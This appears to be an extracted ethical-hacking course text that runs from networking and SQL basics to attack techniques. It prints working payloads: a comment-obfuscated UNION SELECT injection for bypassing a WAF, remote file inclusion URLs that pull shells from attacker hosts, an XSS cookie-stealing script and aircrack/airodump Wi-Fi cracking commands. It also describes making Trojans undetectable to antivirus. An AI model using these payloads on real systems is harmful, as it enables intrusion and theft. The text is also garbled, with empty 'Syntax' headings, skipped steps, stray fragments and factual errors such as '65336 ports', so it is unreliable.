2.Global IP or Public IP: -IP address provided by the DHCP to the host when it
gets connected to the internet. Global IP is not static IP i.e. it changes every time when
you are connected to the internet.((
(source:-www.wikipedia.com)
Examples of Global IP are:
Airtel: 122.0.0.1-122.255.255.254
BSNL: 57.0.0.1-57.255.255.254
Vodafone: 1.0.0.1-1.255.255.254
Tata: 14.0.0.1-14.255.255.254
Reliance: 112.0.0.0-112.255.255.255
ssss
IP VERSIONS:
There are two versions of IP:
IPv4: - In IPv4 an address consists of 32 bits which limits the address
space to 4294967296 (232) possible unique addresses. IPv4 reserves some addresses for
special purposes such as private networks i.e.18 million addresses or multicast
addresses i.e.270 million addresses.
IPv4 addresses are canonically represented in dot-decimal notation, which consists of
four decimal numbers, each ranging from 0 to 255, separated by dots, e.g.,
172.16.254.1. Each part represents a group of 8 bits of the address. In some cases of
technical writing, IPv4 addresses may be presented in various hexadecimal, octal,
or binary representations.
IPv6: -This new generation of the Internet Protocol was eventually named internet
protocol version 6 (IPv6) in 1995. The address size was increased from 32 to
128 bits (16 octets), thus providing up to 2128 addresses. This is deemed sufficient for the
foreseeable future.
(source:-www.wikipedia.com)
IPSUBNETTING: -
A subnetwork, or subnet, is a logical, visible subdivision of an IP network. The practice
of dividing a network into two or more networks is called sub netting. Computers that
belong to a subnet are addressed with a common, identical, most-significant bit-group
in their IP address. This results in the logical division of an IP address into two fields, a
network or routing prefix and the rest field or host identifier. The rest field is an
identifier for a specific host or network interface. IP SUBNETTING is of two types i.e. IPv4
and IPv6.
DHCP
The Dynamic Host Configuration Protocol (DHCP) provides configuration parameters to
Internet hosts. DHCP consists of two components first one is protocol for delivering
host-specific configuration parameters from a DHCP server to a host and other one is
mechanism for allocation of network addresses to hosts.
Working Of DHCP:- DHCP Assigns the IP address by taking ip pool table length
and capacity in the process. It provide the LAN ip address to the computer which is
connecting to the internet. Every time the computer connects the internet DHCP assigns
a different ip address to the computer .
(source:-www.mywindows.com)
INTRODUCTION TO PORTS
These are the doors of your devices which can be tangible or intangible in nature which
is responsible inlet and outlet of data through the system.
Examples:-
HTTP : 80,8080
HTTPS: 443
SMTP : 25
VOIP : RANDOM
FTP : 21
SFTP : 19, 20
POP3 : 110
The ports above are pre-reserved ports but there are total 65336 Virtual Ports in our
computer.
Source: -Wikipedia
Proxy Servers:-These are the dummy servers which are designed to change
the online identity and giving false identity on internet. These servers basically
used the IP address of any other country to break the restrictions or to hide their
identity. Proxy Servers are also big low level security to your internet surfing.
2. Client Based Proxy Servers:-These are the proxy servers which we use usually
to change our identity online and give security to it.
1. Web based Proxy Servers:-These are those proxy servers which change your
Identity only on that particular browser window.
For Example: -
www.kproxy.com
www.freeproxyserver.ca
www.ninjaproxy.com
Souce:-wikipedia
VPN:-A virtual private network (VPN) extends a private network across a public
network, such as the Internet. It enables users to send and receive data across
shared or public networks as if their computing devices were directly connected to
the private network, and thus are benefiting from the functionality, security and
management policies of the private network. A VPN is created by establishing a
virtual point-to-point connection through the use of dedicated connections, virtual
tunnelling protocols, or traffic encryption.
For Example: -
Cyber Ghost
Hotspot Security Shield
Freegate
Browser Extension: -There Are Some Browser Extension we can also use to hide
our identity.
For Example: -
DOT VPN
Frontend: - Basically Frontends are the Presentation Layer Between User and
Backend Technologies. Linux Based Frontend are Apache, TOMCAT (PHP). Windows
Based Frontend are IIS (Internet Information Services) (ASP, ASPX)
www.whois.domaintools.com
www.whois.com
Domain Id
Registrant Email
Registrant Id
IP location
Server type etc.
www.yougetsignal.com
It can be done through some software’s like i.e. Soft perfect Network Scanner or
Angry IP Scanner.
Intelligent Information Gathering:-It is the type of information
which consists of some deep information about the Target/Victim computer.
This Information Consists of: -
1. Operating System
2. Open Closed Filtered Ports
3. Services Running on Open Ports
4. Version of Services of applications running on open ports.
It can be done through kali Linux with Software’s like nmap or zenmap.
Requirement:-
1.HirenBootCD
2.Blank CD or 1 GB Pendrive
Steps:-
3.Then Turn On Your Pc Into BIOS Mode By pressing usually with F2 (In Some Computers
it may different like F8.F10,DEL.)
4.After Going to BIOS Mode than Change Boot Priority.
12.Select Option Search for SAM Database(s) on all hard disks and logical drives.
13.In next Step Press Enter And Select Your User Name From List.
14.Select Clear the User's Password and Press Y to save.
INTRODUCTION TO MALWARES
Malware refers to the malicious programming in the computer used to disrupt
computer operations, accessing sensitive information, Getting uninformed access of the
computer etc. These are of many types :-
(www.wikipedia.com)
3. Trojans: -These are the RATs (Remote Administration Tools), once your
computer is infected with the Trojan it can be controlled remotely from
anywhere in the world. Hence an attacker can control entire hardware capacity
and bandwidth of your computer from anywhere in the world.
There are Two types of Trojans: -
Direct Trojans: -In this type of Trojan once any computer is infected then it
will not send the access to the attacker hence attacker has to know the IP
address of the computer which is infected.
(www.wikipedia.com)
4. Rootkits: -These are the add on’s of the virus and other malware codes which
gives a shelter to the code to make it invisible from all kind if anti-viruses and IDS
(Intrusion Detection System) and IPS(Intrusion Prevention system) systems.
These are designed to enable access to a computer or areas of its software that
would not otherwise be allowed (for example, to an unauthorized user) while at
the same time masking its existence or the existence of other software.
(www.pcworld.com)
6. Spywares: - Spywares are the scripts which steals the credentials via a web
browser and sends the details to the attacker. Also it can be used to spy and
extract secret details and send back the attacker.
7. Adware’s: -These are the websites from which people raises huge money
through advertisement. Designed to generate huge money from Google AdSense
by infected the websites and showing their advertisements on websites and
software’s when you install them without reading and selecting options.
If they don’t pay after 48 hours all files will be shredded and then deleted.
(www.pcworld.com)
Evading Antivirus
When we hear word Virus our mind thinks about antivirus. Antivirus can save us from
low level virus which are fully detectable. Even Paid or Premium Antiviruses Can’t Save
us from FUD (Fully Undetectable) Virus. Criminal make virus FUD Nature by using some
tools. In this Demo We can see how easily antivirus are bypassed.
1.First We Created a Trojan then we test that virus on a site called
www.virustotal.com
2.In this pic we can see that out 54 antiviruses 50 find it a virus.
5.This time there are only 29 antiviruses that find it virus. So from This Demo we can see
how easily antivirus are bypasable.
Phishing Attack
An attempt to acquire information such as usernames, passwords, and credit card
details by masquerading as a trustworthy entity in an electronic communication.
Whaling: -Several recent phishing attacks have been directed specifically at senior
executives and other high profile targets within businesses, and the term whaling has
been coined for these kinds of attacks. In the case of whaling, the masquerading web
page/email will take a more serious executive-level form. The content will be crafted to
target an upper manager and the person's role in the company. The content of a
whaling attack email is often written as a legal subpoena, customer complaint, or
executive issue. Whaling scam emails are designed to masquerade as a critical business
email, sent from a legitimate business authority. The content is meant to be tailored for
upper management, and usually involves some kind of falsified company-wide concern.
Whaling phisher men have also forged official-looking FBI subpoena emails, and claimed
that the manager needs to click a link and install special software to view the subpoena.
Source
SOCIAL ENGINEERING
Social Engineering (SE) is a blend of science, psychology and art. While it is amazing
and complex, it is also very simple.Unlike hacking, social engineering basically is done
by the social skills of a person .In this type of engineering all the information is accessed
by the permission of the user. It can also be defined as “Any act that influences a person
to take an action that may or may not be in their best interest.” It consists of many
types:
1. Baiting
Baiting involves dangling something you want to entice you to take an action the criminal
desires. It can be in the form of a music or movie download on a peer-to-peer site, or it can
be a USB flash drive with a company logo labelled “Executive Salary Summary Q1 2013” left
out in the open for you to find. Then, once the device is used or downloaded, the person or
company’s computer is infected with malicious software allowing the criminal to advance
into your system.
2. Phishing
Phishing involves false emails, chats, or websites designed to impersonate real systems with
the goal of capturing sensitive data. A message might come from a bank or other well
known institution with the need to “verify” your login information. It will usually be a self-
made (fake) login page with all the right logos to look legitimate. It could also be a message
claiming you are the “winner” of some prize or lottery with a request to hand over your
bank information.
3. Pretexting
Pretexting is the human equivalent of phishing, where someone acts as an authority figure
or someone your trust to gain access to your login information. It can take form as fake IT
support needing to do maintenance, or a false investigator performing a company audit.
Someone might impersonate co-workers, the police, tax authorities or other seemingly
legitimate people in order to gain access to your computer and information.
Email Encryption
Internet Technology have many flows, loopholes, bugs. Cyber Criminal can easily hack
into your email account by many methods like social engineering, keylogger etc. You can
save yourself from hackers after hacked into your account by using email encryption.
You just have to set a private key that encrypt your whole message. If someone want
read your original massage you just have to decrypt that email message with your
private key which you have set before you sent that message. Software that we can use
to encrypt our emails: -
Source
SQL Basics
SQL: -Structured Query Language is a special-purpose programming language
designed for managing data held in a relational database management system (RDBMS),
or for stream processing in a RDSMS. Source
Some of The Most Important SQL Commands
1.SELECT
Syntax
2. DISTINCT
In a table, a column may contain many duplicate values; and sometimes you only want
to list the different (distinct) values.
The DISTINCT keyword can be used to return only distinct (different) values.
Syntax
3. WHERE
The WHERE clause is used to extract only those records that fulfill a specified criterion.
Syntax
SELECT column_name,column_name
FROM table_name
WHERE column_name operator value;
4. And & OR
The AND operator displays a record if both the first condition AND the second condition are true.
The OR operator displays a record if either the first condition OR the second condition is true.
AND Syntax
OR Syntax
5. Order By
The ORDER BY keyword is used to sort the result-set by one or more columns.The
ORDER BY keyword sorts the records in ascending order by default. To sort the records
in a descending order, you can use the DESC keyword.
Syntax
6. Insert Into
Syntax
7. Update
UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
8. Delete
Syntax
9. Injection
SQL injection is a technique where malicious users can inject SQL commands into an SQL
statement, via web page input.Injected SQL commands can alter SQL statement and
compromise the security of a web application.
The SELECT TOP clause is used to specify the number of records to return.
The SELECT TOP clause can be very useful on large tables with thousands of records.
Returning a large number of records can impact on performance.
Syntax
13. Like
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name LIKE pattern;
14. Wildcards
In SQL, wildcard characters are used with the SQL LIKE operator. SQL wildcards are used
to search for data within a table.
Wildcard Description
% A substitute for zero or more characters
_ A substitute for a single character
[charlist]
Syntax
15. IN
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name IN (value1,value2,...);
16. Between
The BETWEEN operator selects values within a range. The values can be numbers, text, or dates.
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value.
17.Between
Syntax
SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value1 AND value2;
18. Aliases
SQL aliases are used to give a database table, or a column in a table, a temporary name.
Basically aliases are created to make column names more readable.
Syntax
19. Union
The UNION operator is used to combine the result-set of two or more SELECT
statements.
Notice that each SELECT statement within the UNION must have the same number of
columns. The columns must also have similar data types. Also, the columns in each
SELECT statement must be in the same order.
Syntax
The SELECT INTO statement selects data from one table and inserts it into a new table.
Syntax
SELECT *
INTO newtable [IN externaldb]
FROM table1;
The INSERT INTO SELECT statement selects data from one table and inserts it into an
existing table. Any existing rows in the target table are unaffected.
Syntax
We can copy all columns from one table to another, existing table:
22. Create DB
Syntax
Tables are organized into rows and columns; and each table must have a name.
Syntax
24.CHECK
The CHECK constraint is used to limit the value range thsat can be placed in a column.
If you define a CHECK constraint on a single column it allows only certain values for this
column.
If you define a CHECK constraint on a table it can limit the values in certain columns
based on values in other columns in the row.
25. Index
An index can be created in a table to find data more quickly and efficiently.
The users cannot see the indexes, they are just used to speed up searches/queries.
Syntax
26. Drop
The DROP INDEX statement is used to delete an index in a table.
Syntax
27. Alter
The ALTER TABLE statement is used to add, delete, or modify columns in an existing
table.
Syntax
CREATE TABLE Persons
(
ID int NOT NULL AUTO_INCREMENT,
LastName varchar(255) NOT NULL,
FirstName varchar(255),
Address varchar(255),
City varchar(255),
PRIMARY KEY (ID)
)
29. Views
Syntax
Syntax
Source
SQL Injection
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause
repudiation issues such as voiding transactions or changing balances, allow the
complete disclosure of all data on the system, destroy the data or make it otherwise
unavailable, and become administrators of the database server.
Source
First We Have to Setup the XAMPP Server and We Have to Copy Our DVWA Framework
Folder to htdocs folder of XAMPP installed directory. After Moving the folder to XAMPP
Folder. Then Start Your XAMPP’s Apache and MySQL server. After All these Process, visit
your local host. In URL Add folders directory. Now Your DVWA Framework is configured
for work.
Target: http://127.0.0.1/dvwa/vulnerabilities/sqli/
http://127.0.0.1/dvwa/vulnerabilities/sqli/
GET : .php?id=10
POST: .php
Users
2 Giorden Brown
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2'&Submit=Submit#
Step 3: Count the total number of columns in the respective URL table.
Step 4:Dump the DDL of the table's columns for custom query execution.
Table: information_schema.tables
Columns :information_schema.columns
Target : users
--------
Organisation
a= alpha
a=char
apple=word
apple=string
users-->string ????
Step 1: Get any GET method in the URL of the website. I.e We have to look for any
Something=Something.
http://testasp.vulneb.com/showforum.asp?id=0
NOte : Error Based Injection works on LIFO rule. Last in First out.
For Example: If we have a database with tables like followings
threads -> 1
teacher->2
classes->3
fee->4
users->5
uname:admin
upass: none
Google Dorks
Google Dork or Google Hacking Means Use some advanced google search filters to find
a specific result. Hackers Use these filters to find unexpected exposed data like SQL
Admin, Credit Card no. etc.
History of Google Dorks: The concept of "Google Hacking" dates back to 2002,
when Johnny Long began to collect interesting Google search queries that uncovered
vulnerable systems and/or sensitive information disclosures - labeling them google
Dorks.
The list of google Dorks grew into large dictionary of queries, which were eventually
organized into the original Google Hacking Database (GHDB) in 2004.These Google
hacking techniques were the focus of a book released by Johnny Long in 2005, called
Google Hacking for Penetration Testers, Volume 1. Since its heyday, the concepts
explored in Google Hacking have been extended to other search engines, such as Bing
and Shodan. Automated attack tools use custom search dictionaries to find vulnerable
systems and sensitive information disclosures in public systems that have been indexed
by search engines.
But in 2012 Google held an open challenge for anyone to infiltrate their resisting
servers. For a full visual timeline, detailing the major events and developments in
Google Hacking from 2002 to Present, see the Google Hacking History by Bishop Fox.
History Source
IPS :Intrution Prevention System : Again it works on a black list coupled woth a lot of
attack database range , if any one in the network apply the attack which matches with the
database of attacks , IPS will block the req and hence that IP again cannot communicate in
the same network i.e Black Listed IP address.
Web Application Firewall : When a web site owner deploy a application software
containing all kind of attack database in it and filter the request deployed by the
vistor , then we can say that the application which is deployed on the website is web
application firewall.
Types of WAF
1. Software WAF: These are the firewall technologies which are just like a software
application can be installed on the web server and hence can be used to filetr the
requested contents.
2. Hardware WAF : These are the UTM systems ( Unified Threat Management Systems) i.e
it contains Antivirus + Firewall + IDS and IPS + Web Filteration for Content etcetc etc.
Mod Security : Mod Security comes to picture in early 2008 when hackers are on the peak
and defacing websites all over the world. This was era when there are many paid firewalls
but there was no solution for the middle level organisations.
Mod Security came and gives a little hope to web site owners dat they will protect from
hackers.
Problems
Every WAF works on two principal formats first White List and Black List filteration.
1. White List : When we declare the owner must only login from a certain static
IP as well as MAC address and username and password. Hence even the password got
leaked no one can login the website unless he is not on the same IP and the MAC address.
2. Black List : It's the second way of securing the website hence it will be having a
database of all the non sense attacks especially string based ( order by ), (union all select)
etcetcetc.Hence any request carrying this kind of string from VISITOR will be get filtered
by the blacklist and in response will block if match with any string from the list.
sudogedit /etc/apache2/sites-available/000-default.conf
After opening this file i.e 000-default.conf we have to change the IP address of the server
or the website name whose traffic which we want to filter from mod security.
Inline Comments : /* */
/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/
Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1'
/*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from
information_schema.columns where table_name='users'--+&Submit=Submit#
Honeypots
Honeypots are the traps deployed by the web developers in which hackers try to attack
andhoneypot logs the IP and cookies of the hackers for the further law enforcement
acivities.
Types of HoneyPots
1. Production HoneyPot : These are the middle level honey pots deployed by teh middle
level organisatiosn as its cheap in price , easy to deploy and easy to moniter.But they
comes up with a simple report as outcome.
2. Research Honeypot : Which are develeoped by the Govt Agencies for research purpose
or National Security hence they are deployed on area's site like Nuclear power points, oil
pipe line franeowrk controls and etc etc. RH are very expensive in nature , also gives a
very extensive information about any mishappeningoccoured, which is very very difficult
to understand and monitor also.
Blind injection
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that
asks the database true or false questions and determines the answer based on the
applications response. This attack is often used when the web application is configured
to show generic error messages, but has not mitigated the code that is vulnerable to
SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error
messages from the database complaining that the SQL Query's syntax is incorrect. Blind
SQL injection is nearly identical to normal SQL Injection, the only difference being the
way the data is retrieved from the database. When the database does not output data
to the web page, an attacker is forced to steal data by asking the database a series of
true or false questions. This makes exploiting the SQL Injection vulnerability more
difficult, but not impossible.
3. You cannot dump the entire database by interacting with through the control panel.
5. You cannot see the other website's code and other stuff which are on the same server
on which your website is hosted.
2. If server have 777 permissions then u can even traverse the entire server HDD and
access other website's data too and damage the same.
3. You can dump the entire data base once you started interaction with the machines.
MAC/Linux : terminal
www.rahul.com/hello/main/test/etc/regular/www/upload.php
- Upload images
- Upload your CV
Step 3: According to the technology and webserver support we will upload our control
panel i.e hackers control panel on the website.
For Example: If there is an option for uploading the .jpg file still you can upload and pdf
file. and if you can upload pdf file you can also upload urphp shell file.
www.xyz.com/images/hack.php
Tough Uploading : When web developer deploy an static validation that this type of file
format can only be uploaded.
Manual vulnerability auditing of all your web applications is complex and time
consuming,since it generally involves processing a large volume of data. It also demands
a high level ofexpertise and the ability to keep track of considerable volumes of code
used in a web application. In addition, hackers are constantly finding new ways to
exploit your web application, which means that you would have to constantly monitor
the security communities, and find new vulnerabilities in your web application code
before hackers discover them.
Mainly Burp Suite contains a large number of attacks and highly popular due to post
parameter discovery.
Instead of looking for vulnerable parameters one by one on the page, we will scan the
entire website and will extract all possible GET and POST hidden parameters which may
or may not be exploitable.
History
Burp Suite comes in action from a company known as Port Swigger. Which mainly works
as a VA tool development organization with respect to OWASP TOP 10 standards.
Mainly this attack is deployed via a technology known as Cross Fired Technology from
AMD or SLI technology from NVidia.
This makes it possible to run two or more graphics cards at a same time to execute this
brute forcing process hence with more core speed via the graphics card it gives a way
much stable speed and results in quick manner as compare to a simple CPU holding
computer.
It’s an attack in which we try to execute certain files by including these files in an out dated CSS part of
the website known as include function.
This include function accepts any kind of executable code file from any untrusted source and include the
same code in the existing page on which the include function is deploying.
www.bank.com/load.html?include=http://www.hi.com/rs.jsp
RFI Shell
www.bank.com/load.html?include=www.hacker.com/shell.php
When any website gives you an interaction point to execute a certain level of shell
based commands through the application layer then we can say website is vulnerable to
command execution vulnerability.
It is concerned with the behavior of the webpages depends upon the user inputs. Mainly
deployed on the dynamic webpages for the validation purposes.
For Example: A simple java script code can be deployed to execute a client side
validation of checking the input for SQL Injection.
Syntax:
<script> ---> Starting Tag
Alert: This function is used to draw a pop up box known as dialogue box. Whatever
the body content of the function is written into it. It will show it as text on the box.
Here You can write two type of data types. First String Based and Integer.
<script>alert ("Welcome to Site”) </script>
Prompt: It is same as alert but also given a text field to write your own text. But it will
not affect the working of the pop up hence only with read only property.
<script>prompt("hi”) </script>
Every website contains a cookie and respective session in browser memory hence if we are
able to get the cookie we can embed the same cookie in our browser and as we open the
same site will be going to enter into the same session of the victim.
<script>alert (document. Cookie) </script>
Why XSS Occurs: When any website takes any kind of executable input from any
unauthorized visitor then we can say that website is vulnerable to XSS attack.
For Example: While Shopping in Flipkart some user entering <h1>Hacked</h1> in search
bar and as he hit search website understand the heading tag and executes it on main
page.
Types of XSS
1. Reflected XSS | Temp. XSS: This XSS only effects a particular user’s browser hence will
not remain permanent for the victors of the website.
Attacks Possible: Criminal can add a form on the vulnerable link and send an Input form
with details like Name, Credit Card no, Password, PINCODE etc. YES, if the vulnerability is
on any Banking website.
2. Stored XSS | Permanent XSS: If the input field is attached to the database then we can
say that it’s a stored XSS.
For Example: Hacker inputs a malicious java script code to steal cookies of all the visitors
of the website who visits for online shopping or banking etc. It can be worse via keylogger
too.
Requirements
--------------
1. Basics of HTML
2. Basics of JAVA SCRIPT
3. DVWA: Reflected + Stored (Low + Medium)
Source
Source
Missing Functional Level Access Control
Most web applications verify function level access rights before making that
functionality visible in the UI. However, applications need to perform the same access
control checks on the server when each function is accessed. If requests are not verified,
attackers will be able to forge requests in order to access functionality without proper
authorization.
Source
Source
LINUX BASICS
1.Command: ls
The command “ls” stands for (List Directory Contents), List the contents of the folder, be
it file or folder, from which it runs.
root@tecmint:~# ls
Android-Games Music
Pictures Public
Desktop Tecmint.com
Documents TecMint-Sync
Downloads Templates
The command “ls -l” list the content of folder, in long listing fashion.
root@tecmint:~# ls -l
total 40588
Command “ls -a“, list the content of folder, including hidden files starting with ‘.’.
root@tecmint:~# ls -a
. .gnupg .dbus
.goutputstream-PI5VVW .mission-control
2.Command: lsblk
The “lsblk” stands for (List Block Devices), print block devices by their assigned name
(but not RAM) on the standard output in a tree-like fashion.
root@tecmint:~# lsblk
The “lsblk -l” command list block devices in ‘list‘ structure (not tree like fashion).
root@tecmint:~# lsblk -l
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
Note: lsblk is very useful and easiest way to know the name of New Usb Device you just
plugged in, especially when you have to deal with disk/blocks in terminal.
3.Command: md5sum
The “md5sum” stands for (Compute and Check MD5 Message Digest), md5 checksum
(commonly called hash) is used to match or verify integrity of files that may have
changed as a result of a faulty file transfer, a disk error or non-malicious interference.
Note: The user can match the generated md5sum with the one provided officially.
Md5sum is considered less secure than sha1sum, which we will discuss later.
4.Command: dd
Command “dd” stands for (Convert and Copy a file), Can be used to convert and copy a
file and most of the times is used to copy a iso file (or any other file) to a usb device (or
any other location), thus can be used to make a ‘Bootlable‘ Usb Stick.
Note: In the above example the usb device is supposed to be sdb1 (You should Verify it
using command lsblk, otherwise you will overwrite your disk and OS), use name of disk
very Cautiously!!!.
dd command takes some time ranging from a few seconds to several minutes in
execution, depending on the size and type of file and read and write speed of Usb stick.
5.Command: uname
The “uname” command stands for (Unix Name), print detailed information about the
machine name, Operating System and Kernel.
root@tecmint:~# uname -a
Linux tecmint 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:36:13 UTC 2013 i686 i686i686 GNU/Linux
Note: uname shows type of kernel. uname -a output detailed information. Elaborating
the above output ofuname -a.
1. “Linux“: The machine’s kernel name.
2. “tecmint“: The machine’s node name.
3. “3.8.0-19-generic“: The kernel release.
4. “#30-Ubuntu SMP“: The kernel version.
5. “i686“: The architecture of the processor.
6. “GNU/Linux“: The operating system name.
6.Command: history
The “history” command stands for History (Event) Record, it prints the history of long
list of executed commands in terminal.
root@tecmint:~# history
10 pwd
12 cd /usr/share/unity/icons/
13 cd /usr/share/unity
Note: Pressing “Ctrl + R” and then search for already executed commands which lets
your command to be completed with auto completion feature.
(reverse-i-search)`if': ifconfig
7.Command: mkdir
The “mkdir” (Make directory) command create a new directory with name path.
However is the directory already exists, it will return an error message “cannot create
folder, folder already exists”.
root@tecmint:~# mkdirtecmint
Note: Directory can only be created inside the folder, in which the user has write
permission. mkdir: cannot create directory `tecmint‘: File exists
(Don’t confuse with file in the above output, you might remember what i said at the
beginning – In Linux every file, folder, drive, command, scripts are treated as file).
8.Command: touch
The “touch” command stands for (Update the access and modification times of
each FILE to the current time).touch command creates the file, only if it doesn’t exist. If
the file already exists it will update the timestamp and not the contents of the file.
Note: touch can be used to create file under directory, on which the user has write
permission, only if the file don’t exist there.
9.Command: chmod
The Linux “chmod” command stands for (change file mode bits). chmod changes the file
mode (permission) of each given file, folder, script, etc.. according to mode asked for.
There exist 3 types of permission on a file (folder or anything but to keep things simple
we will be using file).
Read (r)=4
Write(w)=2
Execute(x)=1
So if you want to give only read permission on a file it will be assigned a value of ‘4‘, for
write permission only, a value of ‘2‘ and for execute permission only, a value of ‘1‘ is to
be given. For read and write permission 4+2 = ‘6‘ is to be given, ans so on.
Now permission need to be set for 3 kinds of user and usergroup. The first is owner,
then usergroup and finally world.
rwxr-x--x abc.sh
Here the root’s permission is rwx (read, write and execute).
usergroup to which it belongs, is r-x (read and execute only, no write permission) and
for world is –x (only execute).
To change its permission and provide read, write and execute permission to owner,
group and world.
Read, write and execute to owner and only execute to group and world.
Note: one of the most important command useful for sysadmin and user both. On a
multi-user environment or on a server, this command comes to rescue, setting wrong
permission will either makes a file inaccessible or provide unauthorized access to
someone.
10.Command: apt
The Debian based “apt” command stands for (Advanced Package Tool). Apt is an
advanced package manager for Debian based system (Ubuntu, Kubuntu, etc.), that
automatically and intelligently search, install, update andresolves dependency of
packages on Gnu/Linux system from command line.
root@tecmint:~# apt-get install mplayer
java-wrappers
Suggested packages:
Note: The above commands results into system-wide changes and hence requires root password (Check ‘#‘ and not
‘$’ as prompt). Apt is considered more advanced and intelligent as compared to yum command.
As the name suggest, apt-cache search for package containing sub package mpalyer. apt-get install, update all the
Read more about apt-get and apt-cache commands at 25 APT-GET and APT-CACHE Commands.
(source:-www.tecmint.com)
Network Security is the process of securing the network in such a way that no
unauthorized person can make harm to our network. Basic purpose of securing network
is to secure data of systems lying in our network. Network Security is a level of
guarantee that all machines in a network are working properly and secure way. Network
Security consists of various policies, to prevent and monitor unauthorized access,
misuse, modification, denial of computer peripherals. Network Security involves the
authorization of access to data in a network to legitimate users, which is controlled by
Network Administrator
Basic of Networking
Routers
Switches
Internet
Intranet
Network- LAN, MAN, WAN
Terminologies
Star, Ring, Bus, Mesh.
IP- Public Private
Default Gateways
Wireless Network comes into action when the use of physical network starts becomes
trouble for mesh network. Physical Network is difficult to maintain and it is expensive as
various physical mediums required for establishing connection with end users. Physical
Medium includes Switches, Hubs, Cables, Connections, and Maintenances etc.
They execute this action via a router having DHCP inbuilt in it. First Company to link
come you with this Wireless Router: DLINK
In starting it creates a problem for network administrator for maintaining its network as
any person can connect to a network without having any authentication process so it
becomes more unsecure as compared to physical.
• It builds upon WEP, to make it more secure by adding extra security mechanism
and algorithms to stop unauthorized access.
• WPA delivers a level of security way beyond anything that WEP can offer.
• The primary difference between WPA and WPA2 is that WPA2 uses a more
advanced encryption technique called AES (Advanced Encryption Standard)
• We prefer WPA2 because it has more than three protection levels, making it
nearly impossible for computer guru hackers to break the encryption.
• AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based
upon the Institute for Electrical and Electronics Engineers’ (IEEE)
2. Clients
3. Broadcasting
4. Beacons Packets
5. Data Packets
6. IV’s
7. ESSID
8. BSSID
9. Channels
10. Authentication
11. Deauthentication
12. Association
13. Interfaces
Network Attacks
Network Attacks:
• DOS Attack
• Network Sniffing
• Botnet Attack
ARP Poisoning
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a
technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP)
messages onto a local area network. Generally, the aim is to associate the attacker's
MAC address with the IP address of another host, such as the default gateway, causing
any traffic meant for that IP address to be sent to the attacker instead.
ARP spoofing may allow an attacker to intercept data frames on a network, modify the
traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such
as denial of service, man in the middle, or session hijacking attacks.
Source
SSL Striping
Heart Bleed
The Heartbleed bug allows anyone on the Internet to read the memory of the systems
protected by the vulnerable versions of the OpenSSL software. This compromises the
secret keys used to identify the service providers and to encrypt the traffic, the names
and passwords of the users and the actual content. This allows attackers to eavesdrop
on communications, steal data directly from the services and users and to impersonate
services and users.
Shell Shock
Shellshock” refers to vulnerabilities found in Bash, a common command-line shell for
Linux and Unix systems.
Shellshock, also known as Bashdoor, is a Family of Security Bugs in the widely used Unix
Bash shell, the first of which was disclosed on 24 September 2014.
• CVE-2014-6277,
• CVE-2014-6278,
• CVE-2014-7169,
• CVE-2014-7186, and
• CVE-2014-7187
Capturing of packets by sitting in between the AP and its users, this process can be done by two ways
i.e. GUI and CLI based application.
For GUI we can use Wireshark Packet Capturing Tool, which comes for windows and Linux operating
system,
For CLI, a tools called airodump is used, which is in built in Kali Linux
# Wireshark Capturing
# Filtering
# Airodump
WEP – Wired Equivalent Proxy (1997)
The flaws in WEP make it susceptible to various statistical cracking techniques. WEP
uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) be random.
The implementation of RC4 in WEP repeats that IV about every
• If we can capture enough number of the IVs, we can decipher/decrypt the key!
# Cracking
ifconfig -a
ifconfig wlan0 up
airodump-ng mon0
ifconfig -a
airodump-ng mon0
airodump-ng
ls
aircrack-ng palvinder-02.cap
Attacks On WPA/WPA2
ifconfig -a
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
ifconfig -a
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0
airodump-ng
airodump-ng -c 1 --bssidC8:D3:A3:2F:D6:F4 -w palvinder mon0
ls
aircrack-ng palvinder-02.cap -w '/root/Desktop/passwords1.lst'
A mobile operating system (or mobile OS) is an operating system for smartphones,
tablets, PDAs, or other mobile devices. While computers such as the typical laptop are
mobile, the operating systems usually used on them are not considered mobile ones as
they were originally designed for bigger stationary desktop computers that historically
did not have or need specific "mobile" features. This distinction is getting blurred in
some newer operating systems that are hybrids made for both uses.